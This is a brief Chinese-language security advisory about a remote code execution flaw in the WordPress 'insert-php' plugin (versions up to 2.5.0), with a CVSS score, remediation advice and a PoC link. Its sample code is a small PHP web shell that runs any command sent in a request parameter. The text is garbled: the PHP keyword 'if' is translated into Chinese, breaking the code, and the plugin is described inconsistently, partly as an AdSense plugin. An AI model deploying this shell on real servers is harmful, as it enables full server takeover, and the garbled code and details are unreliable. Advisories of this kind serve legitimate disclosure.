Woody 代码片段 - 插入页眉页脚代码,WordPress 的 AdSense 广告插件在 2.5.0 及以上版本中都存在通过“insert_php”短代码进行远程代码执行的漏洞。这是因为该插件没有将功能的使用限制给高级授权用户。这使得经过身份验证的攻击者(具有贡献者级别及以上访问权限)能够在服务器上执行代码。
信息:
基本分数: 9.9 严重
向量: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
软件类型: 插件
软件 Slug: insert-php
补救措施: 更新至版本 2.5.1 或更新的修补版本
受影响的版本: <= 2.5.0
示例 PHP 代码:
<?php
error_reporting(0);
$cmd = "$_REQUEST[c]";
如果 ($cmd == "") {
$cmd = "echo > NUL";
}
@system("$cmd");
?>
链接地址:https://github.com/hunThubSpace/CVE-2024-3105-PoC
